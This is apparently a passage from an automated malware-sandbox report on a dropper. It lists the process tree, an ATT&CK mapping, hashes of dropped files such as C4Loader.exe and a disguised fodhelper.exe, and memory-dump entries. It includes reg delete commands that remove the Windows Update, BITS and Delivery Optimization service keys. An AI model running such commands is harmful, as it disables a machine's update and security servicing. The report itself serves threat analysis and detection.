reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:992

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1792

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1764

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:2012

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1176

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "965076851-19281899968757584616414633351727989461-12648548101031971110-1792255165"
1⤵
PID:612

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\18T61W38F173NRCKFO64.temp
Filesize
7KB

MD5
07e83c96c6b2b03fba4d43816cb7b10c

SHA1
4910b242403a62360291e8407efaa271d2c9dd80

SHA256
e38ae0d1b2c48e277658b4675dc279be27a60b0712c53e8554362e7977eb0a66

SHA512
25f8e7c79f298a3fc5fe412ac6bb3ef41f31fe8666c2bf9a62d547bb9cb54aeeae9678116a918408810f8f8f8afb13e825e8e5f93c83069ac2a706d7a634879f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
07e83c96c6b2b03fba4d43816cb7b10c

SHA1
4910b242403a62360291e8407efaa271d2c9dd80

SHA256
e38ae0d1b2c48e277658b4675dc279be27a60b0712c53e8554362e7977eb0a66

SHA512
25f8e7c79f298a3fc5fe412ac6bb3ef41f31fe8666c2bf9a62d547bb9cb54aeeae9678116a918408810f8f8f8afb13e825e8e5f93c83069ac2a706d7a634879f

Download Submit
C:\Windows\System32\Tasks\Telemetry Logging
Filesize
3KB

MD5
78f6e2f6e0462eefb43f9b871ea25d3b

SHA1
1279dba7f0bc2a3fdc3f067381329c5e84d71d68

SHA256
fe1278f39fe1218b83c12e790219762044aa98819197e6737f380fbc243394fa

SHA512
8a678befce66442e32d07112be6fbb9eb9e20ff5b1dae729df821d85e3a85c0ecd4523d30780f1a8afe269350c31f5ecf030c92cc64d0457c3865230429b9856

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bcaae53dc3d930c6ed4642e945fab93d

SHA1
ba3391fb65a312431432dc2339abadce73c0d81a

SHA256
6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

SHA512
9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
memory/276-251-0x0000000000940000-0x0000000000967000-memory.dmp

Filesize
156KB

Download
memory/276-259-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/360-240-0x0000000001D10000-0x0000000001D37000-memory.dmp

Filesize
156KB

Download
memory/416-151-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/416-150-0x0000000000870000-0x0000000000897000-memory.dmp

Filesize
156KB

Download
memory/416-148-0x00000000007A0000-0x00000000007C1000-memory.dmp

Filesize
132KB

Download
memory/416-147-0x00000000007A0000-0x00000000007C1000-memory.dmp

Filesize
132KB

Download
memory/416-152-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/416-222-0x0000000000870000-0x0000000000897000-memory.dmp

Filesize
156KB

Download
memory/432-59-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/432-60-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/460-157-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/460-159-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/460-155-0x0000000000120000-0x0000000000147000-memory.dmp

Filesize
156KB

Download
memory/460-224-0x0000000000120000-0x0000000000147000-memory.dmp

Filesize
156KB

Download
memory/476-161-0x00000000000D0000-0x00000000000F7000-memory.dmp

Filesize
156KB

Download
memory/476-226-0x00000000000D0000-0x00000000000F7000-memory.dmp

Filesize
156KB

Download
memory/476-162-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/476-165-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/484-172-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/484-229-0x0000000000410000-0x0000000000437000-memory.dmp

Filesize
156KB

Download
memory/484-170-0x0000000000410000-0x0000000000437000-memory.dmp

Filesize
156KB

Download
memory/484-171-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/600-191-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/600-230-0x0000000000490000-0x00000000004B7000-memory.dmp

Filesize
156KB

Download
memory/600-185-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/600-177-0x0000000000490000-0x00000000004B7000-memory.dmp

Filesize
156KB

Download
memory/612-293-0x00000000002B0000-0x00000000002D7000-memory.dmp

Filesize
156KB

Download
memory/680-182-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/680-181-0x00000000004D0000-0x00000000004F7000-memory.dmp

Filesize
156KB

Download
memory/680-187-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/680-234-0x00000000004D0000-0x00000000004F7000-memory.dmp

Filesize
156KB

Download
memory/696-267-0x0000000000480000-0x00000000004A7000-memory.dmp

Filesize
156KB

Download
memory/696-297-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/768-183-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/768-180-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/768-178-0x0000000000AC0000-0x0000000000AE7000-memory.dmp

Filesize
156KB

Download
memory/768-232-0x0000000000AC0000-0x0000000000AE7000-memory.dmp

Filesize
156KB

Download
memory/812-190-0x0000000000500000-0x0000000000527000-memory.dmp

Filesize
156KB

Download
memory/812-237-0x0000000000500000-0x0000000000527000-memory.dmp

Filesize
156KB

Download
memory/812-192-0x000007FEBD700000-0x000007FEBD710000-memory.dmp

Filesize
64KB

Download
memory/840-244-0x00000000008E0000-0x0000000000907000-memory.dmp

Filesize
156KB

Download
memory/884-112-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/884-115-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download
memory/884-111-0x000000001B010000-0x000000001B2F2000-memory.dmp

Filesize
2.9MB

Download
memory/884-114-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download
memory/884-117-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download
memory/884-116-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download
memory/968-258-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/968-249-0x0000000000810000-0x0000000000837000-memory.dmp

Filesize
156KB

Download
memory/1016-141-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1016-302-0x00000000003B0000-0x00000000003D7000-memory.dmp

Filesize
156KB

Download
memory/1016-139-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1016-142-0x0000000077310000-0x00000000774B9000-memory.dmp

Filesize
1.7MB

Download
memory/1016-143-0x00000000771F0000-0x000000007730F000-memory.dmp

Filesize
1.1MB

Download
memory/1016-144-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1040-300-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/1040-298-0x00000000009D0000-0x00000000009F7000-memory.dmp

Filesize
156KB

Download
memory/1056-138-0x00000000010F0000-0x0000000001130000-memory.dmp

Filesize
256KB

Download
memory/1056-136-0x00000000010F0000-0x0000000001130000-memory.dmp

Filesize
256KB

Download
memory/1056-137-0x00000000010F0000-0x0000000001130000-memory.dmp

Filesize
256KB

Download
memory/1076-254-0x00000000007C0000-0x00000000007E7000-memory.dmp

Filesize
156KB

Download
memory/1116-262-0x0000000001E70000-0x0000000001E97000-memory.dmp

Filesize
156KB

Download
memory/1116-295-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/1160-128-0x0000000000AC0000-0x0000000000AC8000-memory.dmp

Filesize
32KB

Download
memory/1160-134-0x0000000001110000-0x0000000001190000-memory.dmp

Filesize
512KB

Download
memory/1160-131-0x0000000077310000-0x00000000774B9000-memory.dmp

Filesize
1.7MB

Download
memory/1160-132-0x00000000771F0000-0x000000007730F000-memory.dmp

Filesize
1.1MB

Download
memory/1160-135-0x0000000001110000-0x0000000001190000-memory.dmp

Filesize
512KB

Download
memory/1160-133-0x0000000001110000-0x0000000001190000-memory.dmp

Filesize
512KB

Download
memory/1160-130-0x00000000012B0000-0x00000000012D6000-memory.dmp

Filesize
152KB

Download
memory/1160-127-0x0000000019B50000-0x0000000019E32000-memory.dmp

Filesize
2.9MB

Download
memory/1176-264-0x00000000001E0000-0x0000000000207000-memory.dmp

Filesize
156KB

Download
memory/1208-296-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/1208-265-0x0000000003AE0000-0x0000000003B07000-memory.dmp

Filesize
156KB

Download
memory/1260-54-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1260-56-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1328-303-0x0000000000AE0000-0x0000000000B07000-memory.dmp

Filesize
156KB

Download
memory/1436-101-0x0000000001FA0000-0x00000000024A4000-memory.dmp

Filesize
5.0MB

Download
memory/1436-120-0x0000000001DA0000-0x0000000001EDD000-memory.dmp

Filesize
1.2MB

Download
memory/1500-118-0x0000000000490000-0x00000000004A4000-memory.dmp

Filesize
80KB

Download
memory/1500-294-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1500-107-0x0000000004F30000-0x0000000005096000-memory.dmp

Filesize
1.4MB

Download
memory/1500-125-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1500-92-0x0000000000110000-0x000000000027C000-memory.dmp

Filesize
1.4MB

Download
memory/1500-124-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1500-94-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1500-113-0x0000000005090000-0x00000000051DE000-memory.dmp

Filesize
1.3MB

Download
memory/1500-306-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1500-305-0x0000000004C10000-0x0000000004C50000-memory.dmp

Filesize
256KB

Download
memory/1944-122-0x000000013F250000-0x000000013F610000-memory.dmp

Filesize
3.8MB

Download
memory/1972-301-0x0000000037350000-0x0000000037360000-memory.dmp

Filesize
64KB

Download
memory/1972-299-0x0000000000820000-0x0000000000847000-memory.dmp

Filesize
156KB

Download
memory/1996-103-0x000000000275B000-0x0000000002792000-memory.dmp

Filesize
220KB

Download
memory/1996-99-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

Filesize
2.9MB

Download
memory/1996-100-0x0000000001F10000-0x0000000001F18000-memory.dmp

Filesize
32KB

Download
memory/1996-102-0x0000000002754000-0x0000000002757000-memory.dmp

Filesize
12KB

Download
memory/2012-123-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2040-334-0x0000000000120000-0x0000000000147000-memory.dmp

Filesize
156KB

Download